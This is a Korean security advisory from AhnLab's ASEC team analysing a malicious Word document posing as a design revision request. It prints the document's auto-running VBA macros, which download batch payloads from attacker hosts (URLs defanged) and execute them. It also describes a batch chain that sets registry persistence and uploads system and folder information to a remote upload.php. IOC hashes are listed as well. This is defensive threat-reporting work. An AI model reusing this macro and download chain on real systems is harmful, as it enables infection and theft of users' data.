디자인수정 요청 문서로 위장한 정보 탈취 목적의 악성 워드

ASEC 분석팀은 국내 사용자를 대상으로 한 악성 워드 문서가 유포되고 있음을 확인하였다. 파일명은 디자인수정 요청.doc 로 아래와 같이 매크로 실행을 유도하는 이미지가 포함되어있다.

그림1. 워드 문서에 포함된 이미지
그림2. 디자인수정 요청.doc 문서 정보

해당 워드 파일 내부에는 아래와 같이 hxxp://filedownloaders.com/doc09 에서 추가 파일을 다운로드하는 악성 매크로가 포함되어있다. 사용자가 콘텐츠 사용 버튼 클릭 시 매크로가 자동으로 실행되어 추가 악성 파일을 다운로드한다.

Sub Document_Open()
    Dim RetVal As Long
    
    RetVal = download_func(0, "hxxp://filedownloaders[.]com/doc09/no6.txt", "C:\Users\Public\Documents\no1.bat", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/vbs6.txt", "C:\Users\Public\Documents\setup.cab", 0, 0)
    RetVal = download_func (0, "hxxp://filedownloaders[.]com/doc09/temp0101.doc", "C:\Users\Public\Documents\temp.doc", 0, 0)
    
    Dim OpenDoc: Set OpenDoc = CreateObject("Word.Application")
    OpenDoc.Visible = True
    Dim WorkDone: Set WorkDone = OpenDoc.Documents.Open("C:\Users\Public\Documents\temp.doc")

이후 다운받은 temp.doc 문서 파일을 실행한다. 해당 워드 문서는 아래와 같이 국내 기업을 사칭한 내용을 담고 있다.

그림3. temp.doc 본문 내용
그림4. temp.doc 문서 정보

temp.doc 에는 앞서 다운로드한 no1.bat 파일을 실행시키는 매크로가 포함되어 있다.

Sub Document_Open()
   WinExec "C:\Users\Public\Documents\no1.bat", 0
End Sub

워드 파일을 통해 실행된 no1.bat 은 vvire.bat 을 실행시킨다. vvire.bat이 존재하지 않을 경우 hxxp://filedownloaders.com/doc09/vbs6.txt 에서 다운로드 한 setup.cab 파일의 압축 해제 후 vvire.bat을 실행한다.

그림3. no1.bat 파일 내부

vvire.bat은 레지스트리 등록 및 no4.bat 파일 실행, 추가 파일 다운로드 기능을 수행한다.

그림4. vvire.bat 파일 내부

Start.vbs 파일을 레지스트리에 등록하여 vvire.bat 파일이 자동으로 실행될 수 있도록 하며, no4.bat 실행 후 no1.bat을 삭제한다. 이후 특정 파일이 존재하는 지 확인하여 hxxp://senteroman.com/dow11/%COMPUTERNAME%.txt 에서 추가 파일을 다운로드 및 실행한다. 현재 해당 파일의 경우 다운로드가 되지 않아 확인이 불가하다.

Start.vbs 파일은 아래와 같다.

그림5. star.vbs 파일 내부

vvire.bat을 통해 실행된 no4.bat 에서는 아래의 사용자 PC의 정보를 수집하여 hxxp://senteroman.com/upl11/upload.php로 유출하는 기능을 수행한다.

  • C:\Users\%username%\downloads\ 목록
  • C:\Users\%username%\documents\ 목록
  • C:\Users\%username%\desktop\ 목록
  • C:\Program Files\ 목록
  • ip정보
  • tasklist
  • systeminfo

no4.bat 실행 시 C:\Users\Public\Documents\ 폴더에 아래와 같이 수집된 정보가 포함된 파일들이 생성되며, 수집한 정보를 업로드하였을 시 upok.txt 파일을 생성한다.

그림6. 생성된 파일 목록

해당 악성코드와 같이 문서 내부에 매크로 사용을 유도하고 정상적인 사용자를 사칭하는 본문 내용을 가진 악성 파일은 꾸준히 유포되고 있어 사용자의 주의가 필요하다. 또한, 문서에 포함된 매크로가 자동으로 실행되지 않도록 설정하고 의심스러운 문서의 열람을 자제해야한다.

[V3 진단]

  • Downloader/DOC.Generic

[관련 IOC 정보]

  • d6358ce7399df51138f89c74f408c5a9
  • dc7fda2a036016cca23f2867e644682c
  • d2732f2c6f8531e812053e6252c421cf
  • 66384f5091583b0c389918d5c8522cd6
  • hxxp://senteroman.com/upl11/upload.php

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:

5 1 vote
별점 주기
guest
1 댓글
Inline Feedbacks
View all comments
trackback

[…] 분석팀은 작년 12월에 게시한 <디자인수정 요청 문서로 위장한 정보 탈취 목적의 악성 워드>와 동일한 유형의 워드 문서를 확인하였다. 이번에 확인된 워드 문서의 […]